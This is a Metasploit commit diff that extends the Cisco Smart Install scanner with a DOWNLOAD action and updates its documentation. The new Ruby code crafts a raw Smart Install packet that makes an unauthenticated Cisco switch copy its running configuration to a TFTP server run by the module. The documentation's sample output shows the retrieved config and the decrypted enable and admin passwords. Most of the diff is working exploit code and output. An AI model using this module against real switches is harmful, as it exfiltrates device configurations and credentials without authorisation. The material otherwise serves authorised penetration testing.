Land rapid7#9214, @realoriginal's update to the Cisco SMI scanner to also fetch Cisco IOS configs

jhart-r7 · jhart-r7 · commit a33ed82a40cd · 2017-12-18T12:22:26.000-08:00
diff --git a/documentation/modules/auxiliary/scanner/misc/cisco_smart_install.md b/documentation/modules/auxiliary/scanner/misc/cisco_smart_install.md
@@ -5,13 +5,28 @@
 ## Verification Steps
 
   1. Do: ```use auxiliary/scanner/misc/cisco_smart_install```
-  2. Do: ```set [RHOSTS]```, replacing ```[RHOSTS]``` with a list of hosts to test for the presence of SMI
+  2. Do: ```set ACTION SCAN```
+  3. Do: ```set [RHOSTS]```, replacing ```[RHOSTS]``` with a list of hosts to test for the presence of SMI
   3. Do: ```run```
   4. If the host is exposing an identifiable SMI instance, it will print the endpoint.
 
+## Options
+
+### SLEEP
+Time to wait for connection back from target. Default is `60` seconds if using `DOWNLOAD` action
+
+### LHOST
+Address to bind to for TFTP server to accept connections if using `DOWNLOAD` action
+
+## Actions
+There are two actions, default being ```SCAN```
+
+  1. **SCAN** - Scan for Smart Install endpoints. [Default]
+  2. **DOWNLOAD** - Request devices configuration and send to our TFTP server
 
 ## Scenarios
 
+Using the default `SCAN` action
   ```
 msf auxiliary(cisco_smart_install) > run
 
@@ -28,3 +43,19 @@ msf auxiliary(cisco_smart_install) > run
 [*] Scanned 512 of 512 hosts (100% complete)
 [*] Auxiliary module execution completed
 ```
+
+Using the `DOWNLOAD` action
+
+  ```
+[*] 192.168.0.26:4786      - Starting TFTP Server...
+[+] 192.168.0.26:4786      - Fingerprinted the Cisco Smart Install protocol
+[*] 192.168.0.26:4786      - Attempting copy system:running-config tftp://192.168.0.11/kWqjngYF
+[*] 192.168.0.26:4786      - Waiting 60 seconds for configuration
+[*] 192.168.0.26:4786      - Incoming file from 192.168.0.26 - kWqjngYF (31036 bytes)
+[+] 192.168.0.26:4786      - 192.168.0.26:4786 Decrypted Enable Password: testcase
+[+] 192.168.0.26:4786      - 192.168.0.26:4786 Username 'admin' with Decrypted Password: testcase)
+[*] 192.168.0.26:4786      - Providing some time for transfers to complete...
+[*] 192.168.0.26:4786      - Shutting down the TFTP service...
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```
diff --git a/modules/auxiliary/scanner/misc/cisco_smart_install.rb b/modules/auxiliary/scanner/misc/cisco_smart_install.rb
@@ -5,6 +5,7 @@
 
 class MetasploitModule < Msf::Auxiliary
   include Msf::Exploit::Remote::Tcp
+  include Msf::Auxiliary::Cisco
   include Msf::Auxiliary::Scanner
   include Msf::Auxiliary::Report
 
@@ -18,7 +19,7 @@ def initialize(info = {})
           and determines if it speaks the Smart Install Protocol.  Exposure of SMI
           to untrusted networks can allow complete compromise of the switch.
         ),
-        'Author'         => 'Jon Hart <jon_hart[at]rapid7.com>',
+        'Author'         => ['Jon Hart <jon_hart[at]rapid7.com>', 'Mumbai'],
         'References'     =>
           [
             ['URL', 'https://blog.talosintelligence.com/2017/02/cisco-coverage-for-smart-install-client.html'],
@@ -28,13 +29,21 @@ def initialize(info = {})
             ['URL', 'https://github.com/Sab0tag3d/SIET']
 
           ],
-        'License'        => MSF_LICENSE
+        'License'        => MSF_LICENSE,
+        'DefaultAction' => 'SCAN',
+        'Actions' => [
+          ['SCAN', {'Description' => 'Scan for instances communicating via Smart Install Protocol (default)'}],
+          ['DOWNLOAD', {'Description' => 'Retrieve configuration via Smart Install Protocol'}]
+        ],
       )
     )
 
     register_options(
       [
-        Opt::RPORT(4786)
+        Opt::RPORT(4786),
+        OptAddressLocal.new('LHOST', [ false, "The IP address of the system running this module" ]),
+        OptInt.new('SLEEP', [ true, "Time to wait for config to come back", 10]),
+        OptString.new('CONFIG', [ true, "The source config to copy when using DOWNLOAD", "system:running-config" ])
       ]
     )
   end
@@ -46,7 +55,7 @@ def smi?
     sock.puts(SMI_PROBE)
     response = sock.get_once(-1)
     if response
-      if SMI_RE.match?(response)
+      if SMI_RE.match(response)
         print_good("Fingerprinted the Cisco Smart Install protocol")
         return true
       else
@@ -57,10 +66,77 @@ def smi?
     end
   end
 
-  def run_host(_ip)
+  def start_tftp
+    print_status("Starting TFTP Server...")
+    @tftp = Rex::Proto::TFTP::Server.new(69, '0.0.0.0', { 'Msf' => framework, 'MsfExploit' => self })
+    @tftp.incoming_file_hook = Proc.new{|info| process_incoming(info) }
+    @tftp.start
+    add_socket(@tftp.sock)
+    @main_thread = ::Thread.current
+  end
+
+  def cleanup
+    # Cleanup is called once for every single thread
+    if ::Thread.current == @main_thread
+      # Wait 5 seconds for background transfers to complete
+      print_status("Providing some time for transfers to complete...")
+      sleep(5)
+
+      if @tftp
+        print_status("Shutting down the TFTP service...")
+        @tftp.close rescue nil
+        @tftp = nil
+      end
+    end
+  end
+
+  #
+  # Callback for incoming files
+  #
+  def process_incoming(info)
+    return if not info[:file]
+    name = info[:file][:name]
+    data = info[:file][:data]
+    from = info[:from]
+    return if not (name && data && from)
+
+    # Trim off IPv6 mapped IPv4 if necessary
+    from = from[0].dup
+    from.gsub!('::ffff:', '')
+
+    print_status("Incoming file from #{from} - #{name} (#{data.length} bytes)")
+    cisco_ios_config_eater(from, rport, data)
+  end
+
+  def decode_hex(string)
+    string.scan(/../).map { |x| x.hex }.pack('c*')
+  end
+
+  def request_config(tftp_server, config)
+    copy_config = "copy #{config} tftp://#{tftp_server}/#{Rex::Text.rand_text_alpha(8)}"
+    packet_header = '00000001000000010000000800000408000100140000000100000000fc99473786600000000303f4'
+    packet = (decode_hex(packet_header) + copy_config + decode_hex(('00' * (336 - copy_config.length)))) + (decode_hex(('00' * (336)))) + (decode_hex(('00' * 336)))
+    print_status("Attempting #{copy_config}")
+    sock.put(packet)
+  end
+
+  def run_host(ip)
     begin
-      connect
-      return unless smi?
+      case
+        when action.name == 'SCAN'
+          connect
+          return unless smi?
+        when action.name == 'DOWNLOAD'
+          start_tftp
+          connect
+          return unless smi?
+          disconnect # cant send any additional packets, so closing
+          connect
+          tftp_server = datastore['LHOST'] || Rex::Socket.source_address(ip)
+          request_config(tftp_server, datastore['CONFIG'])
+          print_status("Waiting #{datastore['SLEEP']} seconds for configuration")
+          Rex.sleep(datastore['SLEEP'])
+      end
     rescue Rex::AddressInUse, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, \
            ::Errno::ETIMEDOUT, ::Timeout::Error, ::EOFError => e
       vprint_error("error while connecting and negotiating Cisco Smart Install: #{e}")
